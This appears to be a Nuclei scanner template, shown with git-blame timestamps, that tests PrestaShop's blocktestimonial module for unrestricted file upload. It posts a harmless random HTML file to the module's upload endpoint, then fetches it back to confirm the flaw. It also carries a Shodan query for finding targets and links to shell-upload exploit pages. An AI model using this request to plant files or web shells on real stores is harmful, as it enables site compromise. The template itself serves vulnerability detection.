2024-01-19 19:32:28 +00:00
|
|
|
id: prestashop-blocktestimonial-file-upload
|
2023-12-31 16:09:36 +00:00
|
|
|
|
|
|
|
info:
|
2024-01-19 19:32:28 +00:00
|
|
|
name: Prestashop Blocktestimonial Modules - File Upload Vulnerability
|
2023-12-31 16:09:36 +00:00
|
|
|
author: MaStErChO
|
|
|
|
severity: critical
|
|
|
|
reference:
|
|
|
|
- https://3xploit7.blogspot.com/2016/12/pretashop-blocktestimonial-upload-shell.html
|
|
|
|
- https://github.com/indoxploit-coders/blocktestimonial-file-upload
|
|
|
|
- https://exploit.linuxsec.org/prestashop-module-blocktestimonial-file-upload-auto-exploit
|
|
|
|
metadata:
|
2024-01-29 11:58:34 +00:00
|
|
|
max-request: 2
|
2023-12-31 16:09:36 +00:00
|
|
|
framework: prestashop
|
2024-01-29 11:58:34 +00:00
|
|
|
shodan-query: "http.component:\"prestashop\""
|
2024-01-19 19:32:28 +00:00
|
|
|
tags: intrusive,file-upload,blocktestimonial,prestashop
|
|
|
|
|
2023-12-31 16:09:36 +00:00
|
|
|
variables:
|
|
|
|
filename: '{{rand_base(7, "abc")}}'
|
2024-01-19 19:32:28 +00:00
|
|
|
data: '{{rand_base(6, "abc")}}'
|
|
|
|
|
2023-12-31 16:09:36 +00:00
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
|
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
Content-Disposition: form-data; name="testimonial_submitter_name"
|
|
|
|
|
2024-01-19 19:32:28 +00:00
|
|
|
{{data}}
|
2023-12-31 16:09:36 +00:00
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
Content-Disposition: form-data; name="testimonial_title"
|
|
|
|
|
2024-01-19 19:32:28 +00:00
|
|
|
{{data}}
|
2023-12-31 16:09:36 +00:00
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
Content-Disposition: form-data; name="testimonial_main_message"
|
|
|
|
|
2024-01-19 19:32:28 +00:00
|
|
|
{{data}}
|
2023-12-31 16:09:36 +00:00
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
Content-Disposition: form-data; name="testimonial_img"; filename="{{filename}}.html"
|
|
|
|
Content-Type: text/html
|
|
|
|
|
|
|
|
<html>
|
|
|
|
<body>
|
2024-01-19 19:32:28 +00:00
|
|
|
<h1>{{data}}</h1>
|
2023-12-31 16:09:36 +00:00
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl
|
|
|
|
Content-Disposition: form-data; name="testimonial"
|
|
|
|
|
|
|
|
Submit Testimonial
|
|
|
|
------WebKitFormBoundaryLSo7Btb6nGcpR9Cl--
|
2023-12-31 16:34:01 +00:00
|
|
|
|
2023-12-31 16:09:36 +00:00
|
|
|
- |
|
|
|
|
GET /upload/{{filename}}.html HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2023-12-31 16:34:01 +00:00
|
|
|
|
2023-12-31 16:09:36 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2024-01-19 19:32:28 +00:00
|
|
|
part: body_1
|
2023-12-31 16:09:36 +00:00
|
|
|
words:
|
|
|
|
- "Your testimonial was submitted successfully."
|
2024-01-19 19:32:28 +00:00
|
|
|
|
2023-12-31 16:09:36 +00:00
|
|
|
- type: word
|
2024-01-19 19:32:28 +00:00
|
|
|
part: body_2
|
2023-12-31 16:09:36 +00:00
|
|
|
words:
|
2024-01-19 19:32:28 +00:00
|
|
|
- "{{data}}"
|
2024-01-29 12:41:50 +00:00
|
|
|
# digest: 4a0a00473045022100f06f7891c9ab826fd695e459a01cf8aa08cb935526a03d4682f3d2b51b1232b602201c0324d3b39d3864679abdba6fc041f0952695bc744d840c0105e6c9bf424318:922c64590222798bb761d5b6d8e72950
|